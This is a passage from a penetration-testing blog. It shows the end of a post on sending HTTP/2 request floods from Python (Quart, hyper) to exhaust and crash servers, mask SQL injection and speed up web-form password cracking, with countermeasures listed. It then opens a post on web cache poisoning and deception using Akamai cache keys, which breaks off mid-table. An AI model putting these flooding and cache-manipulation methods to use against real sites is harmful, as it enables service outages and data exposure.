<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwz1_jfa4hIaTLvjBGz74h4WQrtRR6O1bIF1gbCuWUaH1OnQ9MHSsa7NLPqEihasXN5HdWTj1mPisd2s5Ji8vHk82Hb5Pdnl4vlGEX3BvOP048l3ZUJ_sD3cedduQgrjGJr6ifOtxHFmU/s1600/Funny-Beyonce-want-the-precious.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="510" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwz1_jfa4hIaTLvjBGz74h4WQrtRR6O1bIF1gbCuWUaH1OnQ9MHSsa7NLPqEihasXN5HdWTj1mPisd2s5Ji8vHk82Hb5Pdnl4vlGEX3BvOP048l3ZUJ_sD3cedduQgrjGJr6ifOtxHFmU/s400/Funny-Beyonce-want-the-precious.jpg" width="382" /></a></div>
<span style="background-color: white;"><br /></span>
Some Python frameworks do support HTTP/2 aka HTTP pipelining , Mouxaxaxa. As of late 2017 there are two Python frameworks that directly support HTTP/2, namely Twisted and Quart with only the latter supporting server-push.<br />
<br />
Quart can be installed via pipenv or pip:<br />
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">$ pipenv install quart
$ pip install quart</span></span><span style="font-family: monospace, monospace; font-size: 14px; white-space: pre-wrap;">
</span></pre>
<div style="text-align: start;">
<br /></div>
<div style="text-align: start;">
This requires Python 3.7.0 or higher (see python version support for reasoning).</div>
<div style="text-align: start;">
<div>
<br /></div>
<div>
A minimal Quart example is:</div>
<div>
<br /></div>
<div>
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">from quart import make_response, Quart, render_template, url_for
app = Quart(__name__)
@app.route('/')
async def index():
result = await render_template('index.html')
response = await make_response(result)
response.push_promises.update([
url_for('static', filename='css/bootstrap.min.css'),
url_for('static', filename='js/bootstrap.min.js'),
url_for('static', filename='js/jquery.min.js'),
])
return response
if __name__ == '__main__':
app.run(
host='localhost',
port=5000,
certfile='cert.pem',
keyfile='key.pem',
)</span></span></pre>
</div>
</div>
<b><br /></b>
Also another library that supports Python HTTP/2 connectivity is hyper. hyper is a Python HTTP/2 library, as well as a very serviceable HTTP/1.1 library.<br />
<br />
To begin, you will need to install hyper. This can be done like so:<br />
<b><br /></b>
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">$ pip install hyper</span></span></pre>
<br />
From the terminal you can launch a request by typing:<br />
<br />
<pre style="background-color: #f8f9fa; border: 1px solid rgb(234, 236, 240); line-height: 1.3em; overflow-wrap: break-word; overflow-x: hidden; padding: 1em; text-align: start;"><span style="font-family: monospace, monospace;"><span style="font-size: 14px; white-space: pre-wrap;">>>> from hyper import HTTPConnection
>>> c = HTTPConnection('http2bin.org')
>>> c.request('GET', '/')
1
>>> resp = c.get_response()</span></span></pre>
<b><br /></b>
Used in this way, hyper behaves exactly like http.client classic Python client. You can make sequential requests using the exact same API you’re accustomed to. The only difference is that HTTPConnection.request() may return a value, unlike the equivalent http.client function. If present, the <span style="color: red;">return value is the HTTP/2 stream identifier.</span><br />
<b><br /></b>
In HTTP/2, connections are divided into multiple streams (due to pipelining). Each stream carries a single request-response pair. You may start multiple requests before reading the response from any of them, and switch between them using their stream IDs.<br />
<b><br /></b>
<b>Note: </b>Be warned: hyper is in a very early alpha. You will encounter bugs when using it. If you use the library, provide feedback about potential issues and send to the creator.<br />
<br />
<b>Making Sense</b><br />
<br />
By dramatically speeding up the number of payloads per second send to the server we increase the chance to crash the system for the following reasons:<br />
<ul>
<li>Multiple HTTP/2 connections sending requests such as the following would cause significant resource allocation, both in the server and the database:</li>
<ul>
<li>File upload requests, with large files to be uploaded.</li>
<li>File download requests, with large files to be downloaded.</li>
<li>POST and GET requests containing exotic Unicode Encoding e.g. %2e%2e%5c etc.</li>
<li>POST and GET requests while performing intelligent fuzzing. </li>
</ul>
<li>Enforcement of single SSL/TLS Handshake: </li>
<ul>
<li>Not much to be said here. Simply enforce a single TLS handshake if the malicious payloads are going to consume more resources than the handshake it self. This will cause the server to consume resources.</li>
</ul>
</ul>
<div>
<b>Note:</b> Such type of an attack can also be used to as a diversion to hide other type of attacks, such as SQLi etc.</div>
<br />
The diagram below demonstrates where potentially system is going to crash first:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiK_8nmylFxl5jSZxUJiAw2VYQOULH8cGYPtYhgWab94gg0eayzCWrHu5OKeCdFmmtRkxIj5o35tfAaNG0U5TJImpGuppJ2CbP4hK1DBQW8Wwxgem9NcH5iTTz3FWfJYpvwFpeQ6Ueoy0/s1600/screenshotcrash.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="607" data-original-width="841" height="459" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiK_8nmylFxl5jSZxUJiAw2VYQOULH8cGYPtYhgWab94gg0eayzCWrHu5OKeCdFmmtRkxIj5o35tfAaNG0U5TJImpGuppJ2CbP4hK1DBQW8Wwxgem9NcH5iTTz3FWfJYpvwFpeQ6Ueoy0/s640/screenshotcrash.png" width="640" /></a></div>
<br />
<br />
<b>Other Uses of The This Tech</b><br />
<b><br /></b>
We can use this knowledge to perform the following tasks:<br />
<ul>
<li>Optimize Web App Scans</li>
<li>Optimize directory enumeration</li>
<li>Optimize online password cracking on Web Forms</li>
<li>Optimize manual SQLi attacks </li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEtynGIF-7zQln33wlG0N5dyBz0GdbbVHWkTBeqQiGUh_iSrbqwHaLPdi2St1hK08p98odsbfFbNVBpnF-0Uhr4QGmDMLxIgafZcKAvjlV2Ra860Q5GZ0SWzD1kKa7yTth6TXpLR3u5uo/s1600/download.jpeg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="164" data-original-width="308" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEtynGIF-7zQln33wlG0N5dyBz0GdbbVHWkTBeqQiGUh_iSrbqwHaLPdi2St1hK08p98odsbfFbNVBpnF-0Uhr4QGmDMLxIgafZcKAvjlV2Ra860Q5GZ0SWzD1kKa7yTth6TXpLR3u5uo/s640/download.jpeg" width="640" /></a></div>
<b><br /></b>
<b>Useful Tools </b><br />
<b><br /></b>
There are some tools out there that make use some of the principles mentioned here:<br />
<ul>
<li>Turbo Intruder - <a href="https://github.com/PortSwigger/turbo-intruder">https://github.com/PortSwigger/turbo-intruder</a> - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. It's intended to complement Burp Intruder by handling attacks that require exceptional speed, duration, or complexity.</li>
<li>Skipfish - <a href="https://code.google.com/archive/p/skipfish/">https://code.google.com/archive/p/skipfish/</a> - Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes.</li>
</ul>
<div>
<b>Countermeasures</b><br />
<b><br /></b>
Things to do to avoid this type of attacks are:<br />
<ul>
<li>Firewall HTTP state filtering rules </li>
<li>Firewall HTTPS state filtering rules </li>
<li>Firewall HTTP/2 blockage - Although not recommended</li>
<li>WAF that checks the following things - </li>
<ul>
<li>User Agent - Check for spoofing the agent </li>
<li>Request Parameters - Check for fuzzing </li>
<li>Request size check.</li>
</ul>
</ul>
That is it folks have fun.......<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYbRTX5lzhE0DqtCrE8iTvNI8E5bXuz6VvyzUSxLecC_2KZbz5YAzsnQr0h_UK-QulEbw8jGDpd2RHo7GBuLfJRlMA-yRwy99FwqUisvxk61BIUlR2yGc1uovWfro2Z-Xc3bdq5Z8betQ/s1600/a2db35ef0afc089ca881241f510cb926--old-cartoon-characters-looney-tunes-characters.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="173" data-original-width="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYbRTX5lzhE0DqtCrE8iTvNI8E5bXuz6VvyzUSxLecC_2KZbz5YAzsnQr0h_UK-QulEbw8jGDpd2RHo7GBuLfJRlMA-yRwy99FwqUisvxk61BIUlR2yGc1uovWfro2Z-Xc3bdq5Z8betQ/s1600/a2db35ef0afc089ca881241f510cb926--old-cartoon-characters-looney-tunes-characters.jpg" /></a></div>
<br /></div>
<br />
<b>References: </b></div>
<ol>
<li style="text-align: justify;"> <a href="https://stackoverflow.com/questions/25239650/python-requests-speed-up-using-keep-alive">https://stackoverflow.com/questions/25239650/python-requests-speed-up-using-keep-alive</a></li>
<li style="text-align: justify;"> <a href="https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon">https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon</a></li>
<li style="text-align: justify;"> <a href="https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/">https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/</a></li>
<li style="text-align: justify;"><a href="https://en.wikipedia.org/wiki/HTTP_persistent_connection">https://en.wikipedia.org/wiki/HTTP_persistent_connection</a> </li>
<li style="text-align: justify;"><a href="https://2.python-requests.org/en/master/user/advanced/#keep-alive">https://2.python-requests.org/en/master/user/advanced/#keep-alive</a></li>
<li style="text-align: justify;"><a href="https://urllib3.readthedocs.io/en/1.0.2/pools.html">https://urllib3.readthedocs.io/en/1.0.2/pools.html</a>.</li>
<li style="text-align: justify;"><a href="https://stackoverflow.com/questions/19312545/python-http-client-with-request-pipelining">https://stackoverflow.com/questions/19312545/python-http-client-with-request-pipelining</a></li>
<li style="text-align: justify;"><a href="https://www.freecodecamp.org/news/million-requests-per-second-with-python-95c137af319/">https://www.freecodecamp.org/news/million-requests-per-second-with-python-95c137af319/</a></li>
<li style="text-align: justify;"><a href="https://www.python.org/downloads/">https://www.python.org/downloads/</a></li>
<li style="text-align: justify;"><a href="https://txzone.net/2010/02/python-and-http-pipelining/">https://txzone.net/2010/02/python-and-http-pipelining/</a></li>
<li style="text-align: justify;"><a href="https://gitlab.com/pgjones/quart?source=post_page---------------------------">https://gitlab.com/pgjones/quart?source=post_page---------------------------</a></li>
<li style="text-align: justify;"><a href="https://gitlab.com/pgjones/quart/blob/master/docs/http2_tutorial.rst">https://gitlab.com/pgjones/quart/blob/master/docs/http2_tutorial.rst</a></li>
<li style="text-align: justify;"><a href="https://hyper.readthedocs.io/en/latest/">https://hyper.readthedocs.io/en/latest/</a></li>
</ol>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-56259719983007042822019-04-16T08:54:00.003-07:002019-05-09T08:56:30.748-07:00Hacking "Temporal Locality"<div style="text-align: justify;">
<b>Introduction</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The reason for this blog post is to analyse certain types of attacks that relate to cache manipulation and recently resurfaced by various BlackHat and Defcon presentation. More specifically we are interested in the following type of attacks:</div>
<div style="text-align: justify;">
<br /></div>
<ul>
<li style="text-align: justify;">Web Cache Poisoning Attacks </li>
<li style="text-align: justify;">Web Cache Deception Attacks</li>
</ul>
<div style="text-align: justify;">
<b>About the cache</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
Many people fail to understand what exactly what is a <i>Web cache</i>, and therefore, I am going to invest a lot of time to analyse and explain what is a cache from Hacker/Security Professional perspective, when conducting a pentest or simple hacking a site.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>The cache</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In computing, a cache is a <i>hardware or software</i> component that stores data so that future requests for that data can be served faster [1]. Hmm interesting, very interesting, also the data stored in a cache might be the result of an earlier computation or a copy of data stored elsewhere [1]. So data might be replicated to other locations within the system that serves the content. A <span style="color: red;">cache hit occurs</span> when the requested data can be found in a cache, while a <span style="color: red;">cache miss</span> occurs when it cannot. Cache hits are served by reading data from the cache, which is faster than recomputing a result or reading from a slower data store; thus, the more requests that can be served from the cache, the faster the system performs.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Some companies host their own cache using software like Varnish, and others opt to rely on a Content Delivery Network (CDN) like Cloudflare, with caches scattered across geographical locations. Also, some popular web applications and frameworks like Drupal have a built-in cache. [3]</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwp63ZQzwlq0yE2bPIIUMIPJBnt7CdA2yyUzVBLp24Eit_AN0hiG_pS0AX8jbjotHMfxDzML4hDiWXLk3E0ZbminDcQ2u8iJo39nIDA7fr1oGQR-fmH7MlMzhvKKe8h_w2r_73jW_WOBc/s1600/cache1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: justify;"><img border="0" data-original-height="475" data-original-width="688" height="440" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwp63ZQzwlq0yE2bPIIUMIPJBnt7CdA2yyUzVBLp24Eit_AN0hiG_pS0AX8jbjotHMfxDzML4hDiWXLk3E0ZbminDcQ2u8iJo39nIDA7fr1oGQR-fmH7MlMzhvKKe8h_w2r_73jW_WOBc/s640/cache1.png" width="640" /></a></div>
<div style="text-align: justify;">
The diagram above we have a simplified scenario, were the user has two different paths:</div>
<div style="text-align: justify;">
<br /></div>
<div>
<ul>
<li style="text-align: justify;">1 blue - 2 blue - 3 yellow and 4 yellow </li>
<li style="text-align: justify;">1 blue - 2 blue - 3 orange </li>
</ul>
</div>
<div style="text-align: justify;">
The path to be followed (aka. user flow interaction with the target web system) depends on the cache device internal decision process. Cache device internal decision process, simplistically speaking is the the cache device algorithm used to make decisions on what content would be served, and the part we would be interested in hacking or subverting. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Cache manipulation</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following diagram demonstrates how someone can potentially manipulate the web cache to extract sensitive information:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheGAuH3gINj1pXOFLcqt6NVECt_ESDNkFxa1H3qDYZ-0fcqo-qxWYqa9Y6j7Pu4geDRIHnaf7-77OnJdo-AJghC5ICpnxyAP4o5cId9QGK57rODOpIZdVZqOuCsEmpwOjKVoZnLq633E/s1600/cache2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="583" data-original-width="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhheGAuH3gINj1pXOFLcqt6NVECt_ESDNkFxa1H3qDYZ-0fcqo-qxWYqa9Y6j7Pu4geDRIHnaf7-77OnJdo-AJghC5ICpnxyAP4o5cId9QGK57rODOpIZdVZqOuCsEmpwOjKVoZnLq633E/s1600/cache2.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The legitimate user in Step 1 interacts with the web cache system (aka. the web server and the front end web cache system) and submit/retrieve sensitive content (which should not be cached in the first place). The hacker assesses the rules the cache server is using to store local user content (e.g. identify through experimentation which URL paths are being stored in the cache server etc.) copies and start retrieving sensitive information.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web caching is a core design feature of the HTTP protocol meant to minimize network traffic while improving the perceived responsiveness of the system as a whole. Caches can be found at every level of a content's journey from the original server to the browser. [6]</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web caching works by caching the HTTP responses for <u>requests according to certain rules</u>. Subsequent requests for cached content can then be fulfilled from a cache closer to the user.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div>
<b><br /></b></div>
<div>
<b>What usually is cached?</b></div>
<div>
<b><br /></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXioN4twyIIYH1Q8tBm4XUrwF-7MNJQyHnvMfHoxhS9e49Ta2YEjZbqvII0SfXxkt3XjCi513LkJr14btUVkY66ear5g7AouzlyEOhG25JMpjkSwNSH0vfJ2meI1-44WGZsyzhR88hZmo/s1600/Dr_Evil.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="240" data-original-width="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXioN4twyIIYH1Q8tBm4XUrwF-7MNJQyHnvMfHoxhS9e49Ta2YEjZbqvII0SfXxkt3XjCi513LkJr14btUVkY66ear5g7AouzlyEOhG25JMpjkSwNSH0vfJ2meI1-44WGZsyzhR88hZmo/s1600/Dr_Evil.jpg" /></a></div>
<div>
<br /></div>
<div>
Certain content lends itself more readily to caching than others. Some very cache-friendly content for most sites are:</div>
<div>
<ul>
<li>Logos and brand images</li>
<li>Non-rotating images in general (navigation icons, for example)</li>
<li>Style sheets</li>
<li>General Javascript files</li>
<li>Downloadable Content</li>
<li>Media Files</li>
<li>HTML pages</li>
<li>Rotating images</li>
<li>Frequently modified Javascript and CSS</li>
<li>Content requested with authentication cookies[6]</li>
</ul>
</div>
</div>
<div style="text-align: justify;">
<b>Putting things in perspective</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In order to understand the importance/complexity of the attack it is better to elaborate that high traffic systems (e.g. media content servers etc.) use multiple cache servers. Usually these type of systems assign web cache servers to whole regions (e.g. USA Region cache, EU Region cache etc.). These regions might be whole countries or even continents. Therefore the significance of the impact depends on the following two factors:</div>
<div style="text-align: justify;">
<ul>
<li>The scope of the vulnerable cache servers</li>
<li>The content exposed through the cache servers</li>
</ul>
</div>
<div style="text-align: justify;">
The following diagram demonstrate the issue:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyxdXEe0vqS1eOMwLvhm6Xtgq6HGjWWCjz-Sh6tCMRHoc12tccMHwyc5r8bKE_A3GiI_40qGzE6tscQ9C1yl0A3xx1ykcGWQhAk-2WaWGvBQHjyxOTq0ywUs44IYOqqEsVa25TxU7f1Hw/s1600/cache3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="551" data-original-width="601" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyxdXEe0vqS1eOMwLvhm6Xtgq6HGjWWCjz-Sh6tCMRHoc12tccMHwyc5r8bKE_A3GiI_40qGzE6tscQ9C1yl0A3xx1ykcGWQhAk-2WaWGvBQHjyxOTq0ywUs44IYOqqEsVa25TxU7f1Hw/s1600/cache3.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following diagram demonstrates a complicated infrastructure on cache management:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp88L4WnvWTuYOFHULCdYpgzKpSSaCEOgUf0k_WV8XDt5TKd6X-QxDX6Hga9Iwh0sW7bbtw88QDif5kHDe4AxipWKgu9vma3NzERN5poi4GDHRJFIVOUdwSobhr3r31uCngOYLofksZQ/s1600/push-preload-large-opt.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="390" data-original-width="937" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivp88L4WnvWTuYOFHULCdYpgzKpSSaCEOgUf0k_WV8XDt5TKd6X-QxDX6Hga9Iwh0sW7bbtw88QDif5kHDe4AxipWKgu9vma3NzERN5poi4GDHRJFIVOUdwSobhr3r31uCngOYLofksZQ/s640/push-preload-large-opt.png" width="640" /></a></div>
<div style="text-align: justify;">
<b><br /></b>
<b>Note:</b> In order for an attacker to attack the system she would have to assess the set of the rules of all the intermediate cache proxies.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Web cache criteria </b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web cache is achieved through the the "web cache keys". A web cache key is an identifier of a resource located on the web server. As a study case we will refer to the Akamai community posts to see how web cache keys as configured.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following section is community post describing the concept of the Akamai Cache Key. This information is deduced from several Akamai configuration settings posted in the past. Issues discussed are:</div>
<div style="text-align: justify;">
<div>
<ul>
<li>How does the Edge Server knows which File needs to be cached?</li>
<li>How does the Edge Server retrieve the cached object from the “Cache Store”?</li>
</ul>
</div>
</div>
<div style="text-align: justify;">
<b>Note1:</b> Content is cached on the so called “Cache Store”. The “Cache Store” does represent either the Memory (RAM) or Hard disk of a certain Edge Server.</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Note2: </b>An Akamai Edge server, is a cache server delivering content.<b> </b>To retrieve an object from the Akamai Platform, users must connect to an Akamai Edge server first. The server must apply a set of rules to the request, and then either locate the object in its cache or retrieve it from the origin. [12]</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Note3:</b> Also see sources [9] and [10].</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The following diagram demonstrates a simple topology of an Akamai network:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8DYEwr3lS7QMiVxJ2_lS8cGciSZC82kI82MWTO3XX0VOJiWTvqqDBOjHV8t9jixu88DZM-Q5NUBRvS4i8X8epEa7G3L05w6KF2LCQfjAOrqN0owHKiFjqXKcpn6C8AS0KiyN17BVg7GA/s1600/akamai-ip-accelerator-overview-image.webp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg8DYEwr3lS7QMiVxJ2_lS8cGciSZC82kI82MWTO3XX0VOJiWTvqqDBOjHV8t9jixu88DZM-Q5NUBRvS4i8X8epEa7G3L05w6KF2LCQfjAOrqN0owHKiFjqXKcpn6C8AS0KiyN17BVg7GA/s640/akamai-ip-accelerator-overview-image.webp" width="640" /></a></div>
</div>
<div style="text-align: justify;">
<div>
<br /></div>
<div>
To store an object on the Edge Server “Cache Store” we need to create the “Cache Key” first. The EdgeSuite Configuration Guide does mention that the Akamai Edge Server forms the “Cache Key” based on parts of the "Request ARL".[11]</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<div>
The ARL (Akamai Resource Location) is similar to an URL.The primary function of an ARL is to direct an end user’s request for an object to the Akamai network [13]. The ARL also contains the object’s caching properties.. The difference being that the ARL is specifically defined for objects to be served via the Akamai Network. There are two types of ARLs:</div>
<div>
<ol>
<li>ARL v1: This is the original ARL used in the earlier days of Akamai. It contains instructions for the Edge Server coded into its structure</li>
<li>ARL v2: Instead of coding all instruction into the URL like done for ARL v1, ARL v2 does reference a Configuration File hosted on the Edge Server.</li>
</ol>
</div>
</div>
<div style="text-align: justify;">
<div>
ARL Components which form the Cache Key:</div>
<div>
<ul>
<li>Typecode</li>
<li>Forward [fwd] path (origin server, pathname, filename and extension)</li>
<li>Query string (Optional)</li>
<li>Secure Network Delivery Indicator</li>
<li>HTTP Method (GET, HEAD, etc.)</li>
</ul>
</div>
<div>
<b>Note: </b>The following description count mainly for ARL v2, we are not going to elaborate on ARL v1 as this are not used that often nowadays.</div>
</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
The following diagram breaks the ARL format:</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAcUGIxRDUwwnAwXZWYqdZ03wKDwffZLm49lMJwf0pieH3lYsryrk1y5mLsKOCXXx-3T0rLeV-TZl1p9TsXXz5_BGSESFSbbHXSAwp8ikvYX2IaGA0gEaLXi0Vq8FV8cPdtMKbE7O-86M/s1600/GUID-F9D80DE4-26FB-4CEF-85EE-4E56C7E1AC24-low.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="292" data-original-width="1200" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAcUGIxRDUwwnAwXZWYqdZ03wKDwffZLm49lMJwf0pieH3lYsryrk1y5mLsKOCXXx-3T0rLeV-TZl1p9TsXXz5_BGSESFSbbHXSAwp8ikvYX2IaGA0gEaLXi0Vq8FV8cPdtMKbE7O-86M/s640/GUID-F9D80DE4-26FB-4CEF-85EE-4E56C7E1AC24-low.png" width="640" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
The following section demonstrates the web cache keys using sample HTTP requests:</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<b>Request:</b></div>
<div style="text-align: justify;">
<div>
<br /></div>
<blockquote class="tr_bq">
<i>GET /products.jsp?productId=1 HTTP/1.1</i><i><span style="color: red;">host: shop.edgegate.de</span></i><i>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) Gecko/20100101 Firefox/21.0Accept: */*</i><i><span style="color: red;">Pragma: akamai-x-get-cache-key</span></i></blockquote>
<div>
<br /></div>
</div>
<div style="text-align: justify;">
<b>Response:</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<blockquote class="tr_bq">
<i>HTTP/1.1 200 OK</i><i>Content-Type: text/html; charset=iso-8859-1</i><i>Server: Google Frontend</i><i>Cache-Control: private, max-age=0</i><i>Expires: Thu, 17 Dec 2015 00:00:06 GMT</i><i>Date: Thu, 17 Dec 2015 00:00:06 GMT</i><i>Content-Length: 1127</i><i><span style="color: red;">X-Cache-Key: /L/1168/78685/1m/edgegatecpinotossi.appspot.com/products.jsp?productId=1</span></i><i>Connection: keep-alive</i></blockquote>
<div>
<b>Note:</b> The text marked in red designate the web cache key. </div>
<div>
<i><br /></i></div>
<div>
The following table explains the values used as web cache keys:</div>
</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<table data-aura-rendered-by="54:179;a" style="background-color: white; border-collapse: collapse; border-spacing: 0px; box-sizing: border-box; color: #333333; font-family: Ubuntu; font-size: 13.8px; overflow-wrap: normal; width: auto; word-break: normal;"><tbody style="box-sizing: border-box;">
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="background-color: #999999; box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: white; font-family: "arial"; font-size: 14.6667px;">Name</span></td><td colspan="1" rowspan="1" style="background-color: #999999; box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: white; font-family: "arial"; font-size: 14.6667px;">Value</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">Typecode</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">L</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">Serial</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">1168</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">CPCode</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">78685</span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">TTL</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">1m</span></td></tr>
